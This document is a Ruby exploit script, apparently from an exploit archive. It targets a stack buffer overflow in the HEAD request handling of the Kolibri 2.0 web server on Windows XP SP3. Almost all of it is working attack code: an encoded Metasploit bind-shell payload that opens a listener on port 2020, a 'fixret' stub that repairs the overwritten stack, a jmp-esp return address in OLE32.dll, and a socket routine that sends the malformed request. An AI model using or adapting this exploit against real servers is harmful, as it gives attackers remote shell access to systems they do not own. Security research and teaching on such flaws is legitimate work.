Kolibri HEAD Request Stack Buffer Overflow - FixRet Technique

#!/use/bin/env ruby
#
# Exploit Title: Kolibri HEAD Request Stack Buffer Overflow 
# Date: 03 May 2014
# Exploit Author: Muhamad Fadzil Ramli 
# Vendor Homepage: http://www.senkas.com/kolibri/download.php
# Version: Kolibri 2.0 
# Tested on: Microsoft Windows XP (EN) SP3 [Version 5.1.2600]
# MSF Module : https://drive.google.com/file/d/0B8CrAOgplUJcVGpCTGY3VEVyam8/edit?usp=sharing
#
# Description: 
# The affected software suffer a buffer overflow when a long HEAD command is sent to the server.
# Notes:
# Purposely using larger payload size to overwrite return address location so that 'fixret' technique can be applied.
# Reference:
# 1) http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
# 2) jduck - fixret msf module
# 3) http://www.exploit-db.com/exploits/16970/ (mr_me)
# 4) 'TheLeader' - original exploit

require 'socket'

host = "127.0.0.1"
port = 8080

# ./msfpayload -p windows/shell_bind_tcp LPORT='2020' R | ./msfencode -b '\x00\x0d\x0a\x20\x40\x3f' -t ruby -e x86/alpha_upper
# payload size : 751
bindtcp =
"\x89\xe6\xdb\xda\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a" +
"\x48\x4c\x49\x35\x50\x33\x30\x43\x30\x53\x50\x4c\x49\x5a" +
"\x45\x36\x51\x58\x52\x52\x44\x4c\x4b\x46\x32\x50\x30\x4c" +
"\x4b\x56\x32\x34\x4c\x4c\x4b\x51\x42\x42\x34\x4c\x4b\x44" +
"\x32\x56\x48\x44\x4f\x4e\x57\x51\x5a\x36\x46\x46\x51\x4b" +
"\x4f\x50\x31\x39\x50\x4e\x4c\x37\x4c\x45\x31\x53\x4c\x35" +
"\x52\x36\x4c\x47\x50\x49\x51\x38\x4f\x34\x4d\x33\x31\x48" +
"\x47\x4b\x52\x5a\x50\x36\x32\x51\x47\x4c\x4b\x30\x52\x34" +
"\x50\x4c\x4b\x50\x42\x57\x4c\x55\x51\x4e\x30\x4c\x4b\x57" +
"\x30\x34\x38\x4c\x45\x39\x50\x43\x44\x31\x5a\x33\x31\x38" +
"\x50\x50\x50\x4c\x4b\x31\x58\x55\x48\x4c\x4b\x36\x38\x47" +
"\x50\x45\x51\x4e\x33\x5a\x43\x47\x4c\x57\x39\x4c\x4b\x47" +
"\x44\x4c\x4b\x43\x31\x38\x56\x50\x31\x4b\x4f\x36\x51\x49" +
"\x50\x4e\x4c\x4f\x31\x48\x4f\x54\x4d\x53\x31\x58\x47\x56" +
"\x58\x4d\x30\x32\x55\x4b\x44\x33\x33\x43\x4d\x5a\x58\x47" +
"\x4b\x43\x4d\x37\x54\x34\x35\x4a\x42\x51\x48\x4c\x4b\x31" +
"\x48\x56\x44\x35\x51\x39\x43\x32\x46\x4c\x4b\x34\x4c\x30" +
"\x4b\x4c\x4b\x50\x58\x35\x4c\x33\x31\x39\x43\x4c\x4b\x44" +
"\x44\x4c\x4b\x45\x51\x4e\x30\x4c\x49\x31\x54\x46\x44\x57" +
"\x54\x31\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x36\x31\x4b" +
"\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x44\x52\x5a" +
"\x4b\x4b\x36\x31\x4d\x43\x58\x36\x53\x50\x32\x55\x50\x33" +
"\x30\x35\x38\x33\x47\x54\x33\x47\x42\x51\x4f\x51\x44\x55" +
"\x38\x50\x4c\x32\x57\x56\x46\x33\x37\x4b\x4f\x38\x55\x4e" +
"\x58\x5a\x30\x33\x31\x43\x30\x55\x50\x51\x39\x49\x54\x50" +
"\x54\x56\x30\x55\x38\x51\x39\x4b\x30\x52\x4b\x45\x50\x4b" +
"\x4f\x38\x55\x50\x50\x46\x30\x50\x50\x50\x50\x31\x50\x30" +
"\x50\x51\x50\x56\x30\x32\x48\x5a\x4a\x54\x4f\x59\x4f\x4d" +
"\x30\x4b\x4f\x48\x55\x4b\x39\x58\x47\x56\x51\x39\x4b\x50" +
"\x53\x32\x48\x34\x42\x35\x50\x54\x47\x4b\x54\x4d\x59\x4d" +
"\x36\x52\x4a\x44\x50\x51\x46\x31\x47\x55\x38\x4f\x32\x59" +
"\x4b\x36\x57\x52\x47\x4b\x4f\x49\x45\x30\x53\x46\x37\x33" +
"\x58\x4e\x57\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x48\x55\x46" +
"\x33\x56\x33\x46\x37\x45\x38\x53\x44\x5a\x4c\x37\x4b\x4b" +
"\x51\x4b\x4f\x38\x55\x56\x37\x4b\x39\x39\x57\x33\x58\x54" +
"\x35\x32\x4e\x30\x4d\x33\x51\x4b\x4f\x49\x45\x45\x38\x43" +
"\x53\x52\x4d\x52\x44\x45\x50\x4b\x39\x5a\x43\x30\x57\x56" +
"\x37\x31\x47\x36\x51\x4a\x56\x43\x5a\x45\x42\x51\x49\x30" +
"\x56\x4b\x52\x4b\x4d\x35\x36\x49\x57\x57\x34\x51\x34\x57" +
"\x4c\x43\x31\x33\x31\x4c\x4d\x50\x44\x51\x34\x42\x30\x39" +
"\x56\x53\x30\x50\x44\x46\x34\x50\x50\x30\x56\x51\x46\x31" +
"\x46\x50\x46\x31\x46\x30\x4e\x30\x56\x50\x56\x30\x53\x30" +
"\x56\x43\x58\x42\x59\x38\x4c\x57\x4f\x4d\x56\x4b\x4f\x4e" +
"\x35\x4c\x49\x4b\x50\x50\x4e\x56\x36\x30\x46\x4b\x4f\x56" +
"\x50\x45\x38\x53\x38\x4d\x57\x45\x4d\x55\x30\x4b\x4f\x38" +
"\x55\x4f\x4b\x4c\x30\x58\x35\x39\x32\x51\x46\x42\x48\x4f" +
"\x56\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54" +
"\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x54\x35\x43" +
"\x35\x4f\x4b\x47\x37\x44\x53\x32\x52\x32\x4f\x53\x5a\x45" +
"\x50\x51\x43\x4b\x4f\x58\x55\x41\x41"

# 750 buffer
data = "A" * 796

# fixret stub
# Reference : http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
data[1,9] = "\x90" * 9
data[10,2] = "\x89\xe2"              # mov edx,esp
data[12,6] = "\xc7\x02\x43\x43\x43\x43"    # mov [edx],0x43434343
data[18,3] = "\x83\xc2\x04"           # add edx,4
data[21,3] = "\xc6\x02\xc0"           # mov byte ptr [edx], 0x42
data[24,3] = "\x83\xea\x08"           # sub edx,8
data[27,6] = "\xc7\x02\x41\x41\x41\x41"    # mov [edx],0x41414141
data[33,6] = "\x81\xc4\xfc\xfd\xff\xff"    # add esp,0xfffffdfc
data[39,bindtcp.length] = bindtcp

# Patch the original stack data into the fixer stub
data[14,4] = data[519,4] # patch jmp near 1-4 byte code
data[23,1] = data[523,1] # patch jmp near 5th byte code
data[29,4] = data[515,4] # patch ret addr

# Overwriting part of the payload with ret address and jmp code
data[515,4] = [0x775a693b].pack("V")    # jmp esp # 5.1.2600.6435 [OLE32.dll]
data[519,5] = "\xe9\xfb\xfd\xff\xff"    # jmp $-512

payload =
"HEAD /#{data} HTTP/1.11\r\n\r\n"

s = TCPSocket.new(host, port)
s.send(payload,0)
s.close